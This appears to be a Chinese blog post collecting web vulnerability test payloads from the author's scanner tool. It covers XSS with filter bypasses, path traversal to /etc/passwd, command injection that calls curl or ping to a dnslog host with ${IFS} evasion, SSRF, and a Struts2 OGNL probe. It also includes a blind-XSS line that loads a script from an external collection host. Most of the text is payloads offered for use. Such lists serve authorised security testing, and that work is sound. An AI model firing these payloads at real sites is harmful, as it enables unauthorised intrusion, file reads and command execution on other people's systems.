2. 程式人生 > >WEB漏洞測試payload整理

WEB漏洞測試payload整理

阿新 發佈:2018-12-16

常用web漏洞測試的payload整理,把寫的一個類sqlmap的web安全漏洞測試工具的Payload整理下來,供大家測試時參考。

[反射型xss]

[在html形成]

" '><script>document.title="[random]";</script> <script>document.title="[random]";</script> <svg onload=document.title="[random]";>

[在js形成]

document.title="[random]";// ;document.title="[random]";// ";document.title="[random]"; ';document.title="[random]"; ");document.title="[random]"; ');document.title="[random]";

[在html屬性形成(img)]

888" onload=document.title="[random]" a=" 888' onload=document.title="[random]" a=' 888 onload=document.title="[random]" 

[儲存型xss][通用payload] 測試環境,需要在觸發的地方檢視payload顯示情況

<script>alert(/StoredXssByScriptTag/);</script> "'><script>alert(/StoredXssByScriptTagBypass);</script> [Bypass on Event] [事件型繞過] <img src=1 onerror=alert(/StoredXssByImgTag/)>  #一般富文字不會過濾img標籤 [Bypass pseudo protocol] [偽協議繞過] <iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe> <object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object> [Bypass html5 tag] [html5標籤繞過] <svg onload=prompt(/StoredXssBySvgTag/)> <embed src=javascript:alert(/StoredXssByEmbedTag/);> [Bypass html or js encode] [js編碼,html編碼,十進位制編碼繞過等] <embed src=javas&#99;r&#105;pt:alert(/StoredXssByEmbedTagAndHtmlEncode/);> <video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))> <script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script> 如果進行盲測可以根據xss平臺地址替換相應的js觸發程式碼 "><script src=http://myxss.net/xxxxxx></script>

[靜態檔案讀取][常規檢測]

/../../../../../../../../../../../etc/passwd /../../../../../../../../../../../etc/hosts      /../../../../../../../C:/Windows/system.ini [windows]

[偽造繞過]

/././././././././././././././././././././././././../../../../../../../../etc/passwd       /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd  /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd      /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts 

[字尾繞過]

/../../../../../../../../../../../etc/passwd# /../../../../../../../../../../../etc/passwd%00 /../../../../../../../../../../../etc/passwd#.jpg /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../../etc/passwd#.html /../../../../../../../../../../../etc/passwd%00.html /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd# /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html

[命令執行漏洞]

[常規檢測]

;curl [random].test.dnslog.link  | curl [random].test.dnslog.link  | ping -n 2 [random].test.dnslog.link [Windows]  | ping -c 2 [random].test.dnslog.link  [Linux]

[繞過檢測]

;curl [random].test.dnslog.link#  | curl [random].test.dnslog.link# %20|%20curl%20[random].test.dnslog.link %20|%20curl%20[random].test.dnslog.link# %20|%20ping%20-n%202%20[random].test.dnslog.link %20|%20ping%20-c%202%20[random].test.dnslog.link# a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link a=c;b=url;$a$b [random].test.dnslog.link# ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link ${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link a=c;b=url;$a$b{IFS}[random].test.dnslog.link#

[ssrf漏洞]

http://[random].test.dnslog.link/

[strust2命令執行]

?redirect:http://[random].test.dnslog.link/%25{3*4}

相關推薦

WEB漏洞測試payload整理

常用web漏洞測試的payload整理,把寫的一個類sqlmap的web安全漏洞測試工具的Payload整理下來,供大家測試時參考。 [反射型xss] [在html形成] " '><script>document.title="[random]";&

Web滲透測試思路整理

容器類 web 框架 容器 web前端 掃描端口 開發 web滲透測試 註入 信息收集: 域名/IP 子域名列表 whois: 註冊地址,註冊人,聯系方式等 whois反查: 同ip有哪些站點(旁註),同一個註冊人註冊了哪些域名 社工註冊人信息 指紋識別:

WEB網站測試心得整理

用途 web 容易 心得 還要 習慣 翻頁 運營 url 一、輸入框: 1、正常的字母/文字/數字(正常流程的測試); 2、重復提交(輸入內容後,重復點擊提交按鈕); 3、純異常字符/正常輸入夾雜異常字符(!@#¥%……&*

服務端模版注入漏洞檢測payload整理

服務端模版注入漏洞產生的根源是將使用者輸入的資料被模版引擎解析渲染可能導致程式碼執行漏洞 下表涵蓋了java,php,python,javascript語言中可能使用到的模版引擎,如果網站存在服務端模版注入在能回顯的情況下會將驗證欄的資料當模版執行,利用引擎提供的功能進行了計算大部分執行結果都會變成15227

WEB漏洞測試(二)——HTML注入 & XSS攻擊

上一篇介紹了我們安裝BWAPP來完成我們的漏洞測試 在BWAPP中,將HTML Injection和XSS做了非常詳細的分類,那麼為什麼要將兩個一起講呢?歸根結底,我覺得這兩個分明是一個玩意,充其量是攻擊的方式不一樣。 我們先來介紹一下這兩種漏洞的原理,簡單說:當用戶在

WEB漏洞測試(四)——SSRF與XXE的超淺顯的討論

上一篇部落格我講了下CSRF,這一篇我們就來說下SSRF,別看這兩者名字很像,但是其實差別還是有點大的。 CSRF是偽造客戶端的請求,為了繞開服務端的檢測,在上一篇中我們運用了提交表單的方式去跳向被攻擊網站的方式去偽造請求,從某種意義上說,就是A頁面無法訪問B服務,但是B

滲透測試必知必會—Web漏洞

中國國情 系統錯誤 min jenkins 安全 第三方 weblogic 滲透測試 javascrip https://as.h5con.cn/articles/129985?spm=cnblog 0x00前言   本文為對WEB漏洞研究系列的開篇,日後會針對這些漏洞一一

web測試整理(四) -- 添加/修改/刪除功能

-- 大小 字段 小寫 錯亂 修改 多次 常見 存在 聲明:是參考了很多他人的文章以及自己的一些經驗做了總結,因為時間久遠,也沒有留下當時的參考鏈接,如果涉及引用別人的內容,請留言說明,謝謝 添加、修改 特殊鍵 是否支持Tab鍵 是否支持回車鍵 提示信息

基於Selenium的Web自動化測試實戰&面試題以及答案整理

1.你如何用Selenium測試? Selenium+Maven+TestNG+Jekins   2.你在測試中常遇到哪些問題? 這個常見的比如定位問題,   3.如何解決問題? 先思考,然後百度,考慮網速、電腦配置等原因,這題主要看重解決問題的能力和

Web滲透測試3個要點(資訊收集→漏洞發現→漏洞利用)

現在,隨著企業資訊化建設的開展,越來越多的重要資料會以電子媒介的形式存放,這在方便企業辦公的同時,也造成了極大的安全隱患。近年來,隨著APT攻擊的蔓延,使得越來越多的企業遭受不可挽回的重大損失。一個偶然的機會,有幸邀請到了一家國外專門做web安全的公司來對自己的web系統做安全測試。4周下來,我與幾位安全專家

基於Selenium的Web自動化測試實戰&面試題以及答案整理

1.你如何用Selenium測試? Selenium+Maven+TestNG+Jekins 2.你在測試中常遇到哪些問題? 這個常見的比如定位問題, 3.如何解決問題? 先思考,然後百度,考慮網速、電腦配置等原因,這題主要看重解決問題的能力和思維。

常規36個WEB滲透測試漏洞描述及修復方法----很詳細

  常規WEB滲透測試漏洞描述及修復                                  &nbs

Web安全測試之——XSS漏洞

一、概念 XSS攻擊:跨站指令碼攻擊(Cross Site Scripting),它是Web程式中最常見的漏洞。 XSS攻擊是指攻擊者在網頁中嵌入客戶端指令碼(例如JavaScript), 當用戶瀏覽此網頁時,指令碼就會在使用者的瀏覽器上執行,從而達到攻擊者的目的。比如獲取

基於Selenium的Web自動化測試實戰 課程中面試題和答案整理

1.你如何用Selenium測試?Selenium+Maven+TestNG+Jekins2.你在測試中常遇到哪些問題?這個常見的比如定位問題,3.如何解決問題?先思考,然後百度,考慮網速、電腦配置等原因,這題主要看重解決問題的能力和思維。4.Selenium的工作原理?可以

Web安全測試中常見邏輯漏洞解析(實戰篇)

*文章原創作者: [email protected]漏洞盒子安全研究團隊,轉載請註明來自FreeBuf黑客與極客(FreeBuf.COM)  邏輯漏洞挖掘一直是安全測試中“經久不衰”的話題。相比SQL注入、XSS漏洞等傳統安全漏洞,現在的攻擊者更傾向於利用業務

常規web滲透測試漏洞描述及修復建議

Apache樣例檔案洩漏 測試方法   在連結的根目錄中新增examples或者docs目錄進行訪問判斷! 漏洞描述  apache一些樣例檔案沒有刪除,可能存在cookie、session偽造,進行後臺登入操作 修復建議  1、刪除樣例檔案  2

Web功能測試常用方法

技術分享 cnblogs mage 方法 web src 功能 分享 ges Web功能測試常用方法

11個免費的Web安全測試工具

漏洞 fis 速度 程序 car exploit spark fiddler 專業 1.Netsparker Community Edition(Windows) 這個程序可以檢測SQL註入和跨頁腳本事件。當檢測完成之後它會給你提供一些解決方案。 2.Websecurify

RobotFramework教程使用筆記——web自動化測試彈窗處理

switch lang web自動化 取消 使用 定義 www 普通 .cn 在web自動化測試中會遇到各種彈出框,在selenium中有對這些彈出框的處理。 彈出框一般有這麽幾類: 1、普通的彈出窗口,如果是可以定位的,直接定位到窗口,然後進行相

無線路由器的web漏洞

d-link 替換 訪問 script ppp 機會 頁面 sys 了無 1、XSS漏洞 2、CSRF漏洞   這樣的攻擊方式具體可以由多種形式實現,除了建立欺詐服務器外,還可以使用超鏈接陷阱。所謂的超鏈接陷阱,就是指偽造一個可信的鏈接或者地址,但其實際地址中包含了修改無線